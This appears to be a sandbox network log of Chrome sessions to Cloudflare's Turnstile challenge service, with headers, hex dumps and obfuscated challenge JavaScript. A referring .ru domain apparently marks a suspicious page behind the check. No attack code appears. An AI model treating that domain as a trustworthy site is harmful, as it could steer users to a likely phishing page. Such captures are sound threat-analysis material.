                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.1649720104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:59 UTC797OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Upgrade-Insecure-Requests: 1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: navigate
                                                                                      Sec-Fetch-Dest: iframe
                                                                                      Referer: https://lap.gnoqwwhpwe.ru/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:10:59 UTC1362INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:10:59 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Length: 26636
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                      content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                      cross-origin-embedder-policy: require-corp
                                                                                      cross-origin-opener-policy: same-origin
                                                                                      cross-origin-resource-policy: cross-origin
                                                                                      origin-agent-cluster: ?1
                                                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                      referrer-policy: same-origin
                                                                                      document-policy: js-profiling
                                                                                      2025-01-09 04:10:59 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 31 39 34 61 38 65 62 34 38 34 32 65 63 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                      Data Ascii: Server: cloudflareCF-RAY: 8ff194a8eb4842ec-EWRalt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:10:59 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                      Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                      Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                      Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                      Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                      Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                      Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                      Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                      Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.1649721104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:59 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff194a8eb4842ec&lang=auto HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:00 UTC331INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:10:59 GMT
                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                      Content-Length: 117386
                                                                                      Connection: close
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194acbc6841c6-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:00 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70
                                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"http
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69
                                                                                      Data Ascii: %20longer%20available","turnstile_feedback_description":"Send%20Feedback","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","human_button_text":"Verify%20you%20are%20human","invalid_sitekey":"Invalid%20si
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 66 32 2c 66 33 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 33 31 34 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 39 37 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 32 37 33 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 32 33 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 31 33 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 32 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 39 31 32 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33
                                                                                      Data Ascii: fY,ga,gg,gh,gi,gs,gD,gH,f2,f3){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(314))/1*(-parseInt(gI(897))/2)+parseInt(gI(273))/3+parseInt(gI(723))/4*(parseInt(gI(1013))/5)+parseInt(gI(1282))/6*(parseInt(gI(912))/7)+-parseInt(gI(13
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 48 74 64 66 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 4c 41 7a 6c 59 27 3a 67 55 28 31 31 34 39 29 2c 27 43 4a 48 53 43 27 3a 67 55 28 31 31 39 30 29 2c 27 53 66 65 44 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 51 4f 47 6e 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 53 45 4c 72 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 78 52 51 6b 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 49 7a 79 7a 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21
                                                                                      Data Ascii: ){return h-i},'HtdfV':function(h,i){return i===h},'LAzlY':gU(1149),'CJHSC':gU(1190),'SfeDS':function(h,i){return h(i)},'QOGne':function(h,i){return h(i)},'SELrR':function(h,i){return i!=h},'xRQkP':function(h,i){return h==i},'IzyzQ':function(h,i){return i!
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 3d 30 2c 48 5b 67 58 28 31 32 38 37 29 5d 28 64 5b 67 58 28 31 38 38 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 50 3d 44 5b 67 58 28 31 35 31 34 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 64 5b 67 58 28 31 30 39 32 29 5d 28 64 5b 67 58 28 37 31 36 29 5d 28 49 2c 31 29 2c 64 5b 67 58 28 31 33 30 33 29 5d 28 50 2c 31 29 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 67 58 28 31 32 38 37 29 5d 28 64 5b 67 58 28 31 38 38 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 49 3c 3c 31 7c 50 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 67 58 28 31 32 38 37 29 5d 28 64 5b 67 58 28 31 38 38 29 5d 28 6f 2c 49 29 29
                                                                                      Data Ascii: =0,H[gX(1287)](d[gX(188)](o,I)),I=0):J++,x++);for(P=D[gX(1514)](0),x=0;8>x;I=d[gX(1092)](d[gX(716)](I,1),d[gX(1303)](P,1)),j-1==J?(J=0,H[gX(1287)](d[gX(188)](o,I)),I=0):J++,P>>=1,x++);}else{for(P=1,x=0;x<G;I=I<<1|P,j-1==J?(J=0,H[gX(1287)](d[gX(188)](o,I))
                                                                                      2025-01-09 04:11:00 UTC1369INData Raw: 29 5d 5b 67 58 28 31 34 37 32 29 5d 28 52 2c 27 2a 27 29 3b 45 2d 2d 2c 45 3d 3d 30 26 26 28 45 3d 4d 61 74 68 5b 67 58 28 31 33 33 37 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 42 5b 44 5d 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 67 58 28 31 33 31 33 29 5d 28 49 3c 3c 31 2c 50 26 31 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 67 58 28 31 32 38 37 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3e 3e 3d 31 2c 78 2b 2b 29 3b 45 2d 2d 2c 30 3d 3d 45 26 26 47 2b 2b 7d 66 6f 72 28 50 3d 32 2c 78 3d 30 3b 64 5b 67 58 28 34 36 32 29 5d 28 78 2c 47 29 3b 49 3d 64 5b 67 58 28 31 34 36 33 29 5d 28 49 3c 3c 31 2c 64 5b 67 58 28 31 30 31 31 29 5d 28 50 2c 31 29 29 2c 64 5b 67 58 28 34 31 36
                                                                                      Data Ascii: )][gX(1472)](R,'*');E--,E==0&&(E=Math[gX(1337)](2,G),G++),delete C[D]}else for(P=B[D],x=0;x<G;I=d[gX(1313)](I<<1,P&1),j-1==J?(J=0,H[gX(1287)](o(I)),I=0):J++,P>>=1,x++);E--,0==E&&G++}for(P=2,x=0;d[gX(462)](x,G);I=d[gX(1463)](I<<1,d[gX(1011)](P,1)),d[gX(416
